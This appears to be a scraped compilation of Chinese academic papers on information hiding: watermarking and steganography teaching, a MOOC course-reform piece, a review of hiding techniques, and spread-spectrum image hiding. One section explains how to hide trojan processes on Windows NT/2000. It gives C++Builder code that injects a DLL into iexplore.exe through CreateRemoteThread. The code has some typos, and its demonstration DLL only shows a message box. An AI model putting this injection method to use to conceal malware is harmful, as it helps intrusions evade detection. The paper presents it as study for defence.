随着网络中信息安全事件的不断升温,网络安全教育也越来越受到高校重视。各大高校纷纷开设该类课程。本校计算机科学与技术、信息工程等专业都相继开设《网络与信息安全》、《信息安全》、《信息安全技术》等课程,普及网络安全知识,提高学生的网络安全技能,增加网络安全意识。以《网络与信息安全》课程为例,课程分配学分为4.0,采用“2+2”模式教学,其中理论2.0为课堂教学和课堂讨论课时,实验2.0为实验课时,即每周理论2节课,单周理论课时,双周讨论课,实验课每周2节课。该课程的体系结构如图1所示。[1,2]

教学过程中的基础内容

《网络与信息安全》课程分为三大模块:①网络安全基本知识概述。该模块主要讲述了网络安全的发展和现状问题,列举网络安全问题引发的各种不同影响的案例。②网络攻击技术。该模块主要讲述网络中的一些攻击现象、攻击行为以及攻击工具等。③密码学模块。该模块主要讲述古典密码学和现代密码学的一些应用,以及信息隐藏技术的一些实际作用等。④网络防护技术。该模块主要讲述网络中针对安全的一些防护措施,如防火墙、入侵监测系统等。

以信息隐藏技术为例,该部分内容在整个课程中非常重要,它将一些保密或重要的信息隐藏到另外一个可以公开的媒体之中,如把指定的信息隐藏于数字化的图像、声音或文本当中,充分利用人们的“所见即所得”的心理,来迷惑恶意的攻击者。近几年来,信息隐藏技术不断发展,越来越多地应用在生活中,如隐写术、数字水印、数字指纹、隐藏信道、阈下信道、低截获概率和匿名通信等,是目前较热的话题。[3,4]

在课程中这部分内容是整个课程的重点、难点之一,教学过程采用了比较、举例等方法,课时分配――理论教学:讨论:实验=1:1:2,理论讲授以图1中的知识框架为主线,算法原理及实现方法,讨论和实验结合中软吉大的网络信息安全系统进行教学。综合起来可以把这部分内容分为以下几部分。

1.信息隐藏位图法

位图法目前使用越来越少,但作为一种基础信息隐藏方法,仍有较高的教学应用价值。该方法作为课程中的一个基本知识点,要求学生掌握它的基本原理,并能通过一个案例,掌握主要运算过程如下:

例如,一幅24位BMP图像,文件头和图像数据由54字节组成,文件头不能隐藏信息,从第55字节开始为图像数据部分,这部分可以隐藏信息。图像数据部分是由一系列的8位二进制数所组成,因为每个8位二进制数中“1”的个数只有奇数或偶数两种可能性,因此若一个字节中“1”的个数为奇数,则称该字节为奇性字节,用“1”表示;若一个字节中“1”的个数为偶数,则称该字节为偶性字节,用“0”表示。我们用每个字节的奇偶性来表示隐藏的信息。

设一段24位BMP文件的数据为:01100110,00111100,10001111,00011010,00000000,10101011,00111110,10110000,则其字节的奇偶排序为:0,0,1,1,0,1,1,1.现在需要隐藏16进制信息4F,由于4F转化为8位二进制为01001111,将这两个数列相比较,发现第2,3,4,5位不一致,于是对这段24位BMP文件数据的某些字节的奇偶性进行调制,使其与4F转化的8位二进制相一致:第2位:将00111100变为00111101,则该字节由偶变为奇;第3位:将10001111变为10001110,则该字节由奇变为偶;第4位:将00011010变为00011011,则该字节由奇变为偶;第5位:将00000000变为00000001,则该字节由偶变为奇。

经过变化,8个字节便隐藏了一个字节的信息,这样就能很好地将信息隐藏在位图中了。当然逆向提取隐藏信息需要花费更长的时间。

2.LSB水印提取

LSB(最低有效位)算法是在位图法的基础上将输入的信号打乱,并按照一定的分配规则使嵌入的信息能够散布于图像的所有像素点上,增加破坏和修改水印的难度。水印信号嵌入模型如图2,水印信号检测模型如图3。

3.DCT变换域算法

DCT变换域算法是这一类算法的总称,在它下面的具体的算法会有一些不同。下面介绍一种基于模运算的数字水印算法。该方法将水印作为二值图像(每一像元只有两种可能的数值或者灰度等级状态的图像)进行处理,依据图像在进行DCT变换后系数的统计来选取适当的阈值,通过模处理加入水印。此算法的特点是在水印检测时不需要原始图像(如图4)。

模拟主动水印攻击教学过程

通过基础知识的学习,学生对信息隐藏技术已经有了一定的了解,为了加深记忆,使知识应用得更好,在这部分课程最后增加了一个模拟主动水印攻击的教学模块。该模块主要应用前期的知识完成。常见的水印攻击方法有:移去攻击、几何攻击、密码攻击、协议攻击(如图5)。

通过模拟攻击实验,学生对数字隐藏技术有了更深的了解,对各种算法增加了兴趣。并在课堂上针对结果展开讨论。下页图6为实验模拟攻击后的有效结果之一。

选用LSB或者DCT进行水印攻击,测试可以显示如下页图6效果。

教学成效

通过对课程中信息隐藏技术教学的改进,学生对比较难懂的数字水印部分内容有了更深一步的了解。通过改革,不仅充分调动了学生的积极性,培养了自学能力,开发了创新能力,还锻炼了学生的团队合作意识和实践能力。攻击中涉及算法的选择、操作的选择、速度的快慢,学生都能通过团队合作完成。学生在实践过程中强烈感受到了成功感和自信感。

结束语

本文以信息隐藏技术内容教学为例,阐述了三种不同的信息隐藏技术的基本知识点,分析了它们之间的关联性和区别,提高了学生的团队合作能力和创新思维的培养,加强了学生的学习兴趣。此外,本模式将教学与科研能力培养相融合,更多地引发了学生的思考。该教学模式可推广到其他课程中。

参考文献:

[1]李继芳,奚李峰,董晨.IPR―CDIO环境的计算机工程教育研究[J].计算机教育,2009(18).

[2]李继芳,奚李峰,殷伟凤,高昆.基于合作式学习的计算机导论课程教学[J].计算机教育,2008(10).

隐藏技术论文篇(8)

“慕课”是大规模开放在线课程(Massive Open Online Courses,MOOCs)的谐音,是一种大众免费在线教学方式,不仅参与人数多、免费、开放,而且融入了很多创新性教育方式和理念,已成为推动教育变革的重要教学模式[1]。“翻转课堂”(Flipped Classroom,FC)是指学生在课前通过观看教学视频理解和掌握知识,在实体课堂上通过讨论、实际操作、完成对知识进一步的巩固和强化,从而达到探索创新的教学模式,是近年来受到全球教育界关注讨论的热点话题[2]。

“慕课”与“翻转课堂”的有效结合可以充分利用二者优势,包括线上自学和线下交流两大部分,线上学习主要是学生利用课外时间,在“慕课”平台上观看教学视频,学生可以在线学习、讨论交流、提交作业、在线测试,并将问题反馈给老师,老师也可以在线解答问题,批改作业,通知课程等;线下交流主要通过“翻转课堂”,教师组织学生在实体课堂上对视频中的疑难问题进行讨论、巩固和答疑。可见,线上“慕课”视频学习能增强学生自主学习的主动性,更高效地传递知识,而线下课堂面对面讨论式教学,使师生课内外更多地互动和答疑解惑,更有利于深化、扩展思维,沟通情感,因此,“慕课+翻转课堂”是线上教育和线下教育完美结合的教学模式。

一、“信息隐藏技术”课程特点与现状

“信息隐藏技术”是电子信息工程专业一门重要的专业课程,研究的是利用多媒体信息中的冗余空间携带秘密信息,达到秘密信息伪装传递的目的,也是信息安全研究和社会需求的热门方向。该课程的主要任务是通过对信息隐藏技术知识及算法的学习和实现,培养学生掌握信息隐藏算法的编程能力和创新能力,为从事信息加密、版权保护等软件工作奠定基础。该专业课程涉及广泛的信号与信息处理知识,工程实践性强,学科动向活跃,发展更新速度快。如何教好这门课,使学生真正熟练掌握信息隐藏算法是专业课教师讨论的热点问题。

目前“信息隐藏技术”课程的教学多以教师课堂PPT讲授为主,学生课后练习为辅,这种教学方法单一,再加上该门课程涉及基础课程较多,算法知识点抽象、枯燥,前沿算法更新速度快,学生容易产生厌倦心理。另外,由于算法实现需要具备一定编程基础,将其留给学生课后练习,完成率极低,很难调动学生对该门课程的学习热情和积极性。这种传统的以教师为主体的教学方式不利于学生积极性和创造性的培养,“慕课+翻转课堂”教学模式的出现为传统“信息隐藏技术”课程的教学改革带来了契机,探索该教学模式在“信息隐藏技术”课程中的改革可以充分利用各种多媒体教学和慕课资源,改进课内外的教学内容和方法,优化“教”与“学”的关系,使学生真正掌握信息隐藏技术的技能,为日后的工作或研究打下坚实的基础。

二、“慕课+翻转课堂”在“信息隐藏技术”教学中的优势

(一)引导学生巩固基础知识

“信息隐藏技术”是一门面向高年级同学的专业课,要求已熟练掌握语音信号处理、数字图像处理等多媒体信号与信息处理方面基础知识,并且应熟练掌握一门编程语言。没有这些基础学习此课程会很吃力。实际授课发现,很多学生的前期课程基础不牢,甚至有的根本没有修过相关课程。鉴于这种情况,为了使学生能顺利入门并掌握这门课程,教师可以在“慕课”平台上或推荐一些相关的基础课程,学生在“慕课”平台上有选择地学习自己没学过的课程或掌握不好的知识点,不受时间、地点限制,师生也可以在线交流互动,复习、巩固相关基础知识。

(二)提高学生的学习兴趣和创新能力

“信息隐藏技术”课程的学习应与密码学、隐写术、信息安全、数字水印技术等专业课程相结合,相辅相成。通常学生并不了解该课程在整个学科体系结构中的地位,只是按照学校相应的课程设置进行学习,但是专业课程是相关、相通的,如果有些课程安排在不同学期或不同专业,学生很难同时学习多门课程,自然也不会达到有时效性和针对性的学习效果。利用“慕课+翻转课堂”引导学生充分利用网上公开的慕课资源,同时学习一门或几门相关、相近的课程,了解该方向最新技术进展和发展动向,提高学习的时效性,变被动为主动,启发学生的创新能力。

三、基于“慕课+翻转课堂”的“信息隐藏技术”教学改革探索

(一)“信息隐藏技术”课程建设思路

“信息隐藏技术”这门课程应充分发挥慕课的优势,利用现有的教育部“爱课程”、中国大学慕课等网络在线教学平台[3],建设信息隐藏技术、数字水印技术、隐写术等网上教学资源,为学生提供丰富的在线学习资源。教师在讲授各章节之前应提前告知学生应具备的知识点,告诉学生应该学习哪些基础课程,引导学生带着任务有针对性地学习,以提高学习效率和效果。在教学上采用“翻转课堂”的教学模式,利用面对面课堂教学时间,建立多个小组讨论进行交流互助,对同学在线学习期间遇到的共性难点进行详细讲解。

教师备课应该合理组织教学内容,对信息隐藏算法知识点详细划分,以周为单位设计教学单元,根据知识点的难易程度与学生掌握情况合理安排教学进度和教学内容。教师应及时在慕课平台上检查学生学习情况,及时解答、回复学生交流的问题,批改网上提交作业。同时,改变“信息隐藏技术”传统的考核方式,建立“在线考核+随堂测试+考核报告”的考核方式,更注重平时能力的培养,减轻期末考试的压力。

(二)基于“慕课+翻转课堂”的“信息隐藏技术”

教学设计

1.课前阶段:为了掌握班级学生的知识背景情况,教师可根据信息隐藏技术课程的特点,设计一些与课程相关的在线测试内容,检测学习者的基础和知识储备情况,建议准备一些数字图像处理、语音信号处理、多媒体技术等方面的基础知识进行测试,慕课在线学习者可以自行评定自己是否适合学习该课程。另外,由于线上和线下的学习环境不同,“信息隐藏技术”教学过程中采用“慕课+翻转课堂”的教学模式,应改变以往课堂教学的课程大纲,根据学生的具体情况进行设计。

2.课中阶段:慕课教学模式可以将教学内容与图

片、声音、动画、视频等多种多媒体素材紧密结合起来,例如频域信息隐藏部分教学内容不容易被理解,教师可以使用动画和简洁的文字、图片,让学生更容易接受教学内容,激发学生兴趣。通过翻转课堂教学过程提纲挈领地点拨知识点,将在线学习与课堂讨论结合,增强教学互动,引导学习者适当练习,并及时检验学习效果。同时,慕课课程视频不宜过长,可以根据知识点进行录制,最长10—15分钟,以保证学习者学习视频期间能够精力集中。

3.课后阶段:建立慕课学习论坛,在具体章节中每个视频对应一个讨论区,并且尽量使内容更结构化、模块化。“信息隐藏技术”是一门以实践为主的课程,学习者可以结合实践经验在慕课学习论坛中交流经验、心得,互相提问、解答。主讲教师应定期整理,对学习者比较集中的提问应该及时解答,并做出反馈,这对教师后续教学进度的安排是有帮助的,也是学习者上线率的重要保证。

隐藏技术论文篇(9)

关键词:

信息安全技术;信息隐藏技术;原理;应用

0引言

在Internet广泛应用下,网络已经深入到我们工作生活中的各个领域。当前的电子商务对网络安全提出了更高要求,如信息安全不能得到保障,国家信息安全建设就潜在巨大安全隐患。信息隐藏技术是信息安全领域中的新兴学科,能利用人类感觉器官及多媒体信号的冗余性,将信息隐匿到其它宿主信号中,让信息不易被觉察,也不影响宿主信号的使用价值[1-2]。信息隐藏技术具备不可见性、通用性、安全性等特点,应用前景广阔。本文主要对信息隐藏技术原理、特点及在信息安全领域中的应用进行简要阐述。

1信息隐藏技术

1.1基本原理

信息隐藏技术是一种将待隐信息(密文、软件序列号、版权信息等)利用某嵌入算法隐藏至一个载体信息中,从而获得一个隐藏载体的过程[3]。在此过程中,信息隐藏的目的是要确保信息不被觉察破坏,而此过程中信息的交流存储并不受限制。在信息隐藏技术下配合密码加密能更确保信息安全性。

1.2信息隐藏技术特点

信息在不同媒体掩藏下具备不同的特点,但信息隐藏技术都具备如下基本特点:(1)隐藏性:信息嵌入之后,遮掩载体外部特征不会显著改变,秘密信息的质量也不会下降,不会让人们从感官上察觉到掩护对象的变化,让非法拦截者对是否有秘密信息不能判断。(2)不可测性:隐蔽载体同原始载体特性一致,非法拦截者要将秘密信息检测并提取出来非常困难[4]。(3)不可见性:经过隐藏处理,目标资料质量不会明显下降,对这些隐藏信息,人们不会看见,也不会听见。(4)鲁棒性:信息隐藏技术不会因图像文件出现了某种改动而让隐藏的信息丢失。我们所说的改动包括如下几方面:滤波、重采样等一般信号处理;分割、缩放、平移等一般几何变换;恶意攻击等。(5)自恢复性:隐蔽载体尽管在经过变换操作后会受到破坏,但是只要存在部分数据,就可在宿主信号缺失情况下恢复隐藏信息[5]。(6)安全性:信息隐藏技术中的隐藏算法抗攻击力强,可承受较强程度人为攻击,确保隐藏信息安全可靠。

1.3模型

我们将待隐藏信息称之为为秘密信息,将公开信息称之为载体信息,他可以是文本、图像、视频或者是音频信号。信息隐藏多由密钥来控制,密钥将秘密信息利用嵌入算法隐藏到公开信息中,隐藏载体利用通信信道进行传递,随后在检测器中利用密钥将秘密信息从隐蔽载体中进行检测或恢复.

2信息隐藏术与加密技术的关系

信息的密码技术及隐藏技术都是信息安全保障技术,但两者是有显著区别的。信息加密技术能把明文在加密算法下转换成密文并利用公开信道传送至接收者的手中,非授权者能意识到保密信息存在,但却不能获知信息具体内容。信息隐藏技术下攻击者则不能对保密信息进行直观判断。两种技术不是相互竞争、相互矛盾的,是相互补充的,如果在信息隐藏技术中融入加密技术,那么信息在数据传输的过程中会达到理论上的一个最高的安全级别。

3信息隐藏的常用技术

3.1替换技术

替换就是指的是用秘密信息将伪装载体内的不重要部分替换掉,并对秘密信息进行编码的一种技术,属于空间域操作,将适合的伪装载体嵌入到适当区域,确保数据失真度保持在人的视觉允许的范围之内。这种技术算法简单,但不能抵抗图像压缩、尺寸变化等攻击,鲁棒性较差。

3.2变换技术

变换技术主要包括离散小波变换(DWT)、离散余弦变换(DCT)及离散傅利叶变换(DFT)等,每个技术都具有自身特点,DWT可对图像进行多空间、多尺度、多频率分解,可将输入信号分解成系列低分辨率细节信号;DCT能让空间域内能量重新分布,图像相关性降低;DFT能将图像分割为多个感觉的频段,让秘密信息能选择更适合部分去嵌入。这种技术鲁棒性较好,可抵抗压缩、噪音等的攻击。

3.3扩频技术

扩频技术指的是将一个比特多次嵌入到伪装载体中,让隐藏的信息在过滤之后仍能保留。这种技术尽管传输率差,但是实际应用中,在随机码下能使载有信息数据的基带信号频谱扩展,让信号变成宽带低功率谱密度的信号。其中,跳频扩频、直序扩频最为典型。且这种技术检测只需盲检,即使传输中受到乘性、加性噪音攻击,隐藏信息也不会丢失。

4信息安全技术中信息隐藏技术的应用

4.1对数字知识产权进行保护对数字知识产权进行保护是将数字指纹技术及数字水印技术来解决信息隐藏技术中所遇到的问题[6]。信息隐藏技术利用“数字

水印”在数字知识信息中嵌入签字信号,对数字知识进行产权保护。通过信息隐藏技术可将音频信号、视频信号机数字图像中嵌入不可见的信号标签,可防止攻击者对其进行数据跟踪及非法拷贝。为确保数字信息安全,服务商向用户发送产品同时可在作品中以水印形式将双方信息代码隐藏其中,一旦数字产品出现非法传播,能够利用水印代码对非法散播者进行追查。信息隐藏技术对数字知识产权进行保护中数据嵌入量小,因此对签字信号鲁棒性及安全性都要求很高。数字水印技术在使用中有一定缺陷,一旦所保护媒体被篡改,水印就会被破坏,信息就变得容易识别。而对数字票据来说就不会出现这种情况,数据票据中的隐藏水印在打印之后仍是存在的,因此对于数据票据可以利用对数据进行扫描这一形式对防伪隐藏水印进行提取,以此来判断票据真实与否。

4.2对数据完整性进行鉴定

所谓的数据完整性鉴定指的是对信号完整性及真伪进行判别,指出信号同原始信号间的差别,借此确认信息在传输及存储过程中有没有被破坏、篡改。如果接收到音频、视频等多媒体形式的信号,需对信号原始式进行判断,看信号是否为某一真实信号的修改版本,并要对原始信号内容进行是否真实性的判断[7]。要完成这种鉴定需首先在数据库的管理系统中输入各种完整数据,并制定相应的约束机制,这样才能确保数据在输入及存储过程中的完整性。其次,如数据传输可视的情况下,可以采用数据校验的方式对这些数据进行检测。

4.3对数据进行保密

网络上进行秘密数据传输的过程中最重要的就是要防止一些非法用户将其截获及使用,确保数据安全也是信息安全技术的一个主要内容。随经济全球化,电子信息技术得到了飞速发展,已经涉及到国家军事、政治、金融、商业等众多领域,关系到国家安全及个人隐私。而信息隐藏技术就是要确保网上交流信息的安全性,为信息数据进行保密。例如网上银行的交易数据,电子商务的秘密合同,电子政务的敏感信息,重要文件的数字签名等等都可以利用网络隐藏技术进行保护。除此之外,信息隐藏技术还能够将不愿让人知道的信息内容采用隐藏方式来存储,让数据更为隐匿,保密性更强,信息也更为安全。

4.4对资料不可抵赖性进行确认

网上交易的过程中,参与交易的任何一方对自己的行为都不能抵赖,对于曾接收过、接收到了对方信息也不能否认,这是确保网上交易安全的一个重要环节。在交易系统中应用信息隐藏技术之后,交易体系下的任何一方在接收及发送信息时就可以将自身独特的标记隐藏到传递的信息中,这些隐藏的标记不能被清除,从而能够确保交易过程中任何一方都不能对自己行为进行抵赖[8]。

5结语

综上所述,信息隐藏技术为多媒体信号处理及多媒体通信领域内的一个新兴研究方向,信息隐藏技术能为多媒体信息安全提供新思路。当前国际上的信息隐藏技术可以做到将隐藏信息进行仪器检测,抵抗人为攻击,但是还没有发展到可以实用的阶段,今后将密码技术同信息隐藏技术有机结合,建立不可感知性的数学度量模型,有效进行信息隐藏容量上界的计算,是今后信息隐藏技术需要努力的方向。

作者:李蟾膺 单位:民航西南空管局

参考文献:

[1]古春杰.信息隐藏技术的理论及应用[J].计算机光盘软件与应用,2014(10):189-190

[2]李彩容,胡瑞敏,涂卫平.使用信息隐藏技术保障档案信息安全[J].中国电子商情•通信市场,2013(1):183-187

[3]马秀芳,时晨,赵洪钢.具有广泛军事应用前景的信息隐藏技术[J].电信快报:网络与通信,2013(12):11-13

[4]刘会平,国伟.数字加网信息隐藏技术在隐秘保密通信中的应用[J].计算机应用,2014,34(9):2645-2649

[5]谢灵智.数字水印——信息安全研究新方向[J].信息安全与通信保密,2013(2):28.

隐藏技术论文篇(10)

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了windows nt/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现windows nt/2000系统中进程的隐藏。

1 基本原理

在win95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在windows nt/2000中却完全不同, 无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过windows nt/2000的任务管理器,windows nt/2000的任务管理器均能轻松显示出木马进程,难道在windows nt/2000下木马真的再也无法隐藏自己的进程了?我们知道,在windows系统下,可执行文件主要是exe和com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和socket已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在windows nt/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2 实现方法

为了弄清实现方法,我们必须首先了解windows系统的另一种"可执行文件"----dll,dll是dynamic link library(动态链接库)的缩写,dll文件是windows的基础,因为所有的api函数都是在dll中实现的。dll文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为dll文件不能独立运行,所以在进程列表中并不会出现dll,假设我们编写了一个木马dll,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马dll,如果那个进程是可信进程,(例如浏览器程序iexplore.exe,没人会怀疑它是木马吧?)那么我们编写的dll作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行dll方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口hook、挂接api、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过createthread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过createremotethread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3 实施步骤

1) 用process32next()函数找到宿主进程,获取宿主进程id,并用

openprocess()函数打开宿主进程。

2) 用virtualallocex()函数分配远程进程地址空间中的内存。

3) 用writeprocessmemory()函数将待隐藏的dll的路径名。

4) 拷贝到步骤二已经分配的内存中。

5) 用getprocaddress()函数获取loadlibrarya()函数的实地址(在kernel32.dll中)。

6) 用createremotethread()函数在远程进程中创建一个线程。

7) 它调用正确的loadlibrarya()函数。

8) 为它传递步骤二中分配的内存地址。

4 具体实例

下面是在c++builder 4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include <vcl.h>

#include <windows.h>

#include <stdio.h>

#include <tlhelp32.h>//该头文件包涵了进程操作的api函数

#pragma hdrstop

#include "unit1.h"

#pragma package(smart_init)

#pragma resource "*.dfm"

insisting pszlibfilename;//存放待隐藏的dll文件名

handle hprocesssnap=null;//进程快照句柄

handle hremoteprocess;//远程进程句柄

lpvoid pszlibfileremote;//远程进程中分配给文件名的空间

hmodule phmd;//存放kernel32.dll句柄

handle hremotethread1=null;//存放远程线程句柄

tform1 *form1;

//---------------------------------------------------------

__fast call tform1::tform1(tcomponent* owner)

: tform(owner)

{

}

//---------------------------------------------------------

void __fastcall tform1::button1click(tobject *sender

{

processentry32 pe32={0};

dword dwremoteprocessid;

hprocesssnap=createtoolhelp32snapshot(th32cs_snapprocess,0);

//打开进程快照

if(hprocesssnap==(handle)-1)

{

messagebox(null,"createtoolhelp32snapshot failed","",mb_ok);

exit(0);

} //失败返回

pe32.dwsize=sizeof(processentry32);

if(process32first(hprocesssnap,&pe32)) //获取第一个进程

{

do{

ansistring te;

te=pe32.szexefile;

if(te.pos("iexplore.exe")|| te.pos("iexplore.exe"))

//找到宿主进程,以iexplore.exe为例

{ dwremoteprocessid=pe32.th32processid;

break;

}

}

while(process32next(hprocesssnap,&pe32));//获取下一个进程

}

else

{

messagebox(null,"取第一个进程失败","",mb_ok);

exit(0);

}

hremoteprocess=openprocess(process_create_thread|process_vm

_operation|process_vm_write,false,dwremoteprocessid);

//打开远程进程

pszlibfilename=getcurrentdir()+"\\"+"hide.dll";

// 假设hide.dll是待隐藏的进程

int cb=(1+pszlibfilename.length())*sizeof(char);//计算dll文件名长度

pszlibfileremote=(pwstr)virtualallocex(hremoteprocess,null,cb,

mem_commit,page_readwrite);

//申请存放文件名的空间

bool returncode=writeprocessmemory(hremoteprocess,

pszlibfileremote,(lpvoid)pszlibfilename.c_str(),cb,null);

//把dll文件名写入申请的空间

phmd=getmodulehandle("kernel32.dll");

lpthread_start_routine fnstartaddr=(lpthread_start_routine)

getprocaddress(phmd,"loadlibrarya");

//获取动态链接库函数地址

hremotethread1=createremotethread(hremoteprocess,null,0,

pfnstartaddr,pszlibfileremote,0,null);

//创建远程线

if(hremotethread1!=null)

closehandle(hremotethread1);//关闭远程线程

if(hprocesssnap!=null)

closehandle(hprocesssnap);//关闭进程快照

}

该程序编译后命名为rmtdll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在c++builder4.0环境下编写并编译了下面的hide.dll作为测试:

#include <vcl.h>

#include <windows.h>

#pragma hdrstop

#pragma argsused

bool winapi dllentrypoint(hinstance hinst, unsigned long reason, void* lpreserved)

{

char szprocessid[64];

switch(reason)

{

case dll_process_attach:

{//获取当前进程id

itoa(getcurrentprocessid(),szprocessid,10);

messagebox(null,szprocessid,"remotedll",mb_ok);

break;

}

default:

}

return true;

}

当使用rmtdll.exe程序将这个hide.dll嵌入iexplore.exe进程后假设pid=1208),该测试dll弹出了1208字样的确认框,同时使用ps工具

也能看到:

process id: 1208

c:\winnt\iexplore.exe (0x00400000)

……

c:\winnt\hide.dll (0x100000000)

……

这证明hide.dll已经在iexplore.exe进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5 结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

参考文献

隐藏技术论文篇(11)

在图像信息隐藏领域中,信息隐藏技术具有密钥与安全性、鲁棒性、不可感知性、自恢复性等特征,在信息安全与多媒体信号处理中具有重要安全作用。但在实践应用中由于鲁棒性与不可感知性的矛盾问题,促使扩频通信技术的引进与应用。扩频图像隐秘系统即扩频通信技术在图像信息隐藏领域中的融合应用形式,即SSIS系统,主要是通过数字图像中噪声作用达到信息隐藏作用。

1图像信息隐藏技术与扩频通信技术

1.1信息隐藏技术

上世纪九十年代中期,国外发达国家在信息安全与多媒体信号处理领域中探索出一种创新型保护媒体信息安全的方法。信息隐藏技术的原理主要是基于人类感觉器官的不敏感性,以及多媒体信号自身的冗余性两个方面,将秘密信息有效隐藏在公开媒体信息中,最大限度的达到信息传递的完整性,同时进一步证实媒体信息所有权归属目的。信息隐藏技术应用的形式较广泛,既包括文字、图像,也包括音频和视频。这种信息的使用对媒体信息本身效果并没有什么影响,为此,针对信息隐藏要素产生的问题可以有效处理。例如,信息隐藏技术之中针对安全问题就具有两个方面的意义:(1)公开媒体信息需要确保其在版权以及使用权限方面的问题。(2)在秘密信息方面则需要能够在传输以及保存等方面提供安全。单就信息隐藏技术角度出发,密匙以及安全性等方面的特征为技术属性中的主要特征。针对技术的安全性分析,主要指的是在一个相对独立的隐藏信息系统之中,借助多种环节的共同运作,促使这个技术能够对信息实施保护。不可感知性强调了在系统之中加入不能促使载体产生感知效果声音或者相关视频文件。

1.2扩频通信技术

扩频通信技术手段为应用较高且在检测概率相对较低的情况下使用的技术方法。应用与阿尼了主要是指对等待传输信息频谱等通过一定的而扩频函数方式进行转换,并通过信道完成传输。随后,可以通过借助相应方法完成频带压缩,并能够最终完成对信息的传输。虽然在实施传输的过程中将会造成部分信号受到阻碍,但是仍然可以通过恢复数据信息的方式实现对数据的有效保护。为此,在扩频通信方面也能够被认为是将信息隐藏在宽频伪随机噪声之中完成的一种通信手段。

2扩频通信技术在信息隐藏中应用分析

扩频图像隐秘系统建设之中的关键技术手段就是充分利用了扩频技术,并将其有效融合到低能量高值序列当中,产生了一种表面上为噪声信号标记的隐秘图像。因为嵌入信号产生的能量要明显低于载体图像产生的能量。为此,也就能够形成较小的,且不会被人察觉到的信号。本研究中具体引用了地比率纠错信息技术,针对纠错编码器等的使用能够扩散形成多输出位,并由此可以呈现出实际运用效果。为了可以形成嵌入式的信息,就需要先充分理解存储扩频系统等相关技术理论与概念。参考存储原理之中关于信息发送、接受以及保存等之间形成的伪随机效果。、通过利用私钥,等能够比较轻松的完成上述中任务。例如在对一个相对比较简单的符号进行方案重置的过程中,现在需要假设信号z为-1、1等要素构成的一组信号。扩频序列x主要是一组实属数列,其中采用的是正态分布规则,其中的均值表示为0。信号之间进行调制时,则能够形成全新的实属数列。为此,所有噪声样本之中产生的符号将能够被嵌入到所有信息位当中,并产生全新的变化。信号白噪声可以表现为一般特性。实际解码的工作也相对比较简单,能够在接收端序列之中被复制下来,通过对两种序列之间畸形对比,就能够获得原本复出的所有信号的估值情况。可以通过以下公式进行表示:Sign(s’/n)=m’。虽然,在系统的功能性方面可以满足实际需要,但是在出现噪声的情况下,则进行信号检测过程中将可能造成一定的信息检测缺陷。这种缺陷产生于嵌入信号在进行估值阶段形成的问题,也可能是因为传输信道出现问题造成的。单纯运用嵌入信号样本之中形成的符号变更展现信息,则其中树脂最终都将会回归到0附近。为了能够有效提升针对信号方便的实际检测性能,则需要借助SSIS技术调制方案。通过这种技术手段,可以有效改善调制值方面产生的最小欧式距离。这样就能够使得数据估值发生明显的改变。调制技术也将会形成在一定区间范围内的随机性的序列。通过对随机序列进行非典型变换,将可以掌握其中形成的最小距离。最终对改善检测效果将起到重要作用。

结束语:

综上所述,本研究中这对信息隐藏技术进行了深入性研究,并对高频嵌入信息所具有的不可感知性等问题进行了分析。低频嵌入所存在的问题方面也被详细分析与论述。通过这对低频信号嵌入到相关文件之中阐述,可以进一步对技术研究提供借鉴和帮助,并对目前阶段技术进步具有重要实践意义。

参考文献

[1]马秀芳,时和平,时晨.扩频通信技术在图像信息隐藏领域中的应用[J].电信快报,2012(02):11-14.

[2]任智斌,隋永新,杨英慧,杨怀江.以图像为载体的最大意义位(MSB)信息隐藏技术的研究[J].光学精密工程,2002(02):182-187.

[3]申健,雷菁,李保国,赖雄坤.一种新型信息隐藏技术的研究与实现[J].通信技术,2013(02):96-98.

[4]蔡正保.一种基于扩频和错误控制编码的图像隐写通信系统研究[J].鸡西大学学报,2016(05):43-45.